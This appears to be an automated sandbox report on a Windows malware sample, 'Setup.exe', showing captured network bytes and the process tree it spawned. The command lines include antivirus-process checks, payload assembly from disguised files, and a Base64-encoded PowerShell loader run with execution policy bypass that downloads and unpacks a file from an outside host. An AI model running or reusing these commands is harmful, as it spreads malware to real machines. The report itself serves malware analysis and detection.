                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 40 5f 9f 41 6a d0 e4 84 0f 18 42 db 12 33 52 2d 8e 5c 65 93 25 d9 64 36 ad f8 2f 5d d1 69 02 ac 96 d3 12 6b 1c bb b1 a3 98 a2 9c 47 7f a6 de 50 3e 90 11 a6 39 78 93 03 6f 51 e0 de 59 12 e9 a6 a9 51 13 14 f2 62 86 63 89 b4 c7 60 f3 34 23 d2 a9 55 7b 38 21 98 19 de a6 7e ae 5a 65 cf 96 a0 10 b5 1a 85 5b 02 74 bb a4 55 92 54 5f 1e 29 07 63 a0 a0 d5 6c 3b da 0f a6 64 3f 00 fb fa 43 18 0d 90 0c b0 08 e0 6d 80 8d 00 d5 00 b7 01 3a 0c a1 64 13 00 d2 01 96 02 ac 01 d8 3d 84 ab 7b 93 0f bd 00 96 be c0 ad f1 96 6b d3 88 c7 90 9e c0 0c 5e 0e 5d 82 c2 89 77 9c 4c 13 c7 33 8d 8e 93 cc 87 ea 25 9c 3b 95 83 4a 4e 5a 50 4e f6 21 51 43 f6 b3 af 40 09 b3 dc 97 67 f7 60 6a 62 98 77 48 c9 18 bd 8e 7d e9 21 31 35 93 c8 b6 ce b4 52 19 95 7f af 00 b2 cc 31 4b 72 68 ca 14 05 e6
                                                                                                                                Data Ascii: @_AjB3R-\e%d6/]ikGP>9xoQYQbc`4#U{8!~Ze[tUT_)cl;d?Cm:d={k^]wL3%;JNZPN!QC@g`jbwH}!15R1Krh
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: da 5e 0f 41 7d 65 8f 00 f3 6b ab 02 6c 5e 36 87 94 a5 5b e8 9c 84 b4 60 d6 e8 d3 bc 7d d1 d7 90 16 64 cf 03 3c 80 eb 37 01 2d d9 ba e7 80 35 82 8c eb 90 77 d8 f1 b8 3c ee 55 e0 c4 91 3b 50 8e de 1b f2 9b f7 06 88 ff 05 6e 60 c0 7e cd 31 d3 38 66 94 52 53 62 8a b0 69 95 b6 b1 72 db 58 da 36 56 51 31 ca 9f 1c 6f 73 2c 05 ec a4 b2 69 7d 6c 5a 3f 9b d6 df a6 0d b2 69 83 ed cb fc 5d f0 14 5a 8e af 9e db b4 e9 36 ad ce a6 8d 0a 28 2e 2b 02 f6 76 f0 f6 bc 04 94 a0 a6 42 5a b0 0d 19 2e 68 90 d4 ba 01 45 16 14 55 90 d4 8a d2 4c 4e ec 34 77 a5 05 af 43 64 68 9e ca 96 a7 30 b7 ab 88 50 51 13 41 24 f3 7c 86 e6 a9 cd c0 05 6a d5 44 64 0d 1f 66 bc ca e8 0f 52 8f f7 52 8f 81 a6 d2 54 98 e9 c4 22 b0 59 1c 49 68 d4 ca 34 47 6d 11 ca 57 dc 6c 39 f4 dd 33 f5 1d 99 63 25 f7
                                                                                                                                Data Ascii: ^A}ekl^6[`}d<7-5w<U;Pn`~18fRSbirX6VQ1os,i}lZ?i]Z6(.+vBZ.hEULN4wCdh0PQA$|jDdfRRT"YIh4GmWl93c%
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: ce 0b f1 e6 e4 f7 ef b0 57 b7 c2 de e7 7f 8b 7d b7 7f c3 5e d1 1a 7b 35 87 36 cd a3 8d cd 8d 43 ae f5 41 bc af 79 fe bb 9e 91 ee 88 56 68 ce 34 e9 93 f5 a8 4f 74 50 cf c9 96 4e 21 8b 96 95 dc 73 47 c5 a2 f5 03 96 e2 0d 21 5e ed 1b 5b 68 48 4e 2d 02 fa 15 6e e8 cb d4 b5 f3 44 f5 a7 ca 1a 68 5f a7 6e d2 7f 9e ff a4 57 38 bc 50 aa 29 10 6b 90 e7 5a 99 a8 32 a0 b8 30 59 dd a5 e4 22 0d 2a 45 54 69 17 e3 9c 85 70 7d 71 ba 03 4f 3f 2d 8b 71 01 dd 24 69 42 ec 5b 05 99 cd 28 2c 38 ca 9f 9f 57 0e 31 98 d2 30 17 69 c1 7e 09 56 13 53 26 05 73 c4 72 d1 ad a6 de f7 66 85 1b 5e b9 40 2c ea c6 61 ee 63 11 a7 03 3e 96 fc 0d d6 22 5e 07 1c 3c 56 cf 94 c1 14 59 6a 45 78 4b a1 51 64 8b 16 67 27 c2 82 fb 21 2c b8 25 f5 c2 0a 37 4f be 61 cb ef c2 ba 9b 80 05 53 c1 9e bf e3 70
                                                                                                                                Data Ascii: W}^{56CAyVh4OtPN!sG!^[hHN-nDh_nW8P)kZ20Y"*ETip}qO?-q$iB[(,8W10i~VS&srf^@,ac>"^<VYjExKQdg'!,%7OaSp
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 70 60 e6 fc 86 46 87 2d 74 76 be 1c 3b ef 24 44 a5 d1 89 53 98 4a 30 46 67 0b b9 ad 5a ac c1 44 86 81 55 14 ec 0b 63 f5 d7 10 d3 68 a1 0c 23 81 a2 68 54 02 72 df ca 7a 09 c4 7c 2b 45 d1 fe 0c 77 6c a8 46 6f a2 04 49 b6 b0 33 53 52 df 1e f5 8d 2f d0 23 84 5f 65 08 3d 5a 9b 5b be 95 b8 0d 04 69 d0 10 7a 78 c0 f8 38 e9 85 ee 16 fc 31 94 65 34 9a 43 a8 be cd 75 e8 b6 e1 fb d9 52 6b 8a c0 a9 eb ea 26 09 9a 70 ff 86 3f 7a 2f 8c 0e 71 56 53 a2 e3 e3 c3 17 1d 88 45 17 e3 cb 1f 65 14 67 e4 f7 e3 d6 23 93 e0 7f 60 6f 86 c1 a4 84 11 44 43 04 a1 72 41 a4 92 28 61 3f d3 40 1c 23 78 43 3a df 4a cb 62 19 a5 8f 31 b9 b1 d8 5f bd 0b 5b 2b 69 e5 67 a0 8f 04 ae 06 14 62 b8 13 15 3f a6 cc dc bd 37 f1 1a 0e 96 5c 04 d6 0d d8 5f 98 0e 5e 43 2d 0d fc 75 b0 a4 4e 01 3c 1b d9 cc
                                                                                                                                Data Ascii: p`F-tv;$DSJ0FgZDUch#hTrz|+EwlFoI3SR/#_e=Z[izx81e4CuRk&p?z/qVSEeg#`oDCrA(a?@#xC:Jb1_[+igb?7\_^C-uN<
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 9c ea 03 60 0a 74 bc 1d 55 af bc 53 aa 32 e1 b5 7b 45 85 10 cd e4 7a 6f 3e 17 ed 63 34 f1 2a 04 5d 39 a4 e5 4c 45 09 2b 02 52 15 e3 9f 6f 23 73 b4 d9 d8 d3 f9 9e b0 94 ba a0 88 9c b6 87 0b c0 03 8c 10 e0 6b b8 b8 f8 97 bb e0 6e 8d 2d 14 97 63 85 4d 2f b6 e5 04 27 c1 6a 37 21 68 72 cb 57 00 f2 af e1 29 e8 27 39 78 4b 60 af ad 40 bd 0c fb 2c 50 e3 3b a5 cc 3b 6a fc 45 f2 58 e6 43 12 c6 33 1b d4 1f 52 78 7c ba 95 64 a3 06 0a 28 b6 de 01 ae d6 91 df 77 81 e9 45 91 06 40 ed 34 05 60 1a 40 32 80 11 20 1d 60 fe c2 4e 60 8e 86 83 cf 1e 16 15 27 b0 47 45 c5 e1 1b 0a e5 99 57 19 21 7a 69 df 4b 89 3f 9f 1b 15 47 99 69 4b 1d 4e 6d 56 03 31 cf 94 0b 5d c9 9d ee 12 eb 7e 73 68 2a 3c 7a 31 1e e5 a0 a4 43 e0 cb 13 5f 36 95 d8 04 16 91 98 f1 48 24 e1 d4 0a 21 b7 f1 33 99
                                                                                                                                Data Ascii: `tUS2{Ezo>c4*]9LE+Ro#skn-cM/'j7!hrW)'9xK`@,P;;jEXC3Rx|d(wE@4`@2 `N`'GEW!ziK?GiKNmV1]~sh*<z1C_6H$!3


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:19:44:01
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'079'797 bytes
                                                                                                                                MD5 hash:5EFE766F54925452535EF011161EDD16
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:1
                                                                                                                                Start time:19:44:01
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:19:44:01
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:19:44:03
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:tasklist
                                                                                                                                Imagebase:0x230000
                                                                                                                                File size:79'360 bytes
                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:19:44:03
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:findstr /I "wrsa opssvc"
                                                                                                                                Imagebase:0x200000
                                                                                                                                File size:29'696 bytes
                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:19:44:03
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:tasklist
                                                                                                                                Imagebase:0x230000
                                                                                                                                File size:79'360 bytes
                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:19:44:03
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                Imagebase:0x200000
                                                                                                                                File size:29'696 bytes
                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:19:44:04
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:cmd /c md 189943
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:19:44:04
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:findstr /V "ExpendituresReactionsRioWinterDialReducedPricingSoftware" Dennis
                                                                                                                                Imagebase:0x800000
                                                                                                                                File size:29'696 bytes
                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:19:44:04
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:cmd /c copy /b ..\Handbook + ..\Attorneys + ..\Celebration + ..\Advert + ..\Loop + ..\Objectives + ..\Added X
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:19:44:04
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:Attachment.com X
                                                                                                                                Imagebase:0x550000
                                                                                                                                File size:893'608 bytes
                                                                                                                                MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:19:44:04
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:choice /d y /t 5
                                                                                                                                Imagebase:0xbf0000
                                                                                                                                File size:28'160 bytes
                                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:19:46:23
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1"
                                                                                                                                Imagebase:0xfd0000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:19:46:23
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:19:46:24
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:19:46:25
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBMAGUAbgBnAHQAaAApAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAC4AUwBlAGUAawAoADAALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAGUAZQBrAE8AcgBpAGcAaQBuAF0AOgA6AEIAZQBnAGkAbgApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkACgAgACAAIAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEMAbwBtAGIAaQBuAGUAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEALAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAKACAAIAAgACAAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBDAG8AbQBiAGkAbgBlACgAJABlAG4AdgA6AFQARQBNAFAALAAgACIAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAC4AegBpAHAAIgApAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAFQAbwBBAHIAcgBhAHkAKAApACkACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ACgAgACAAIAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAe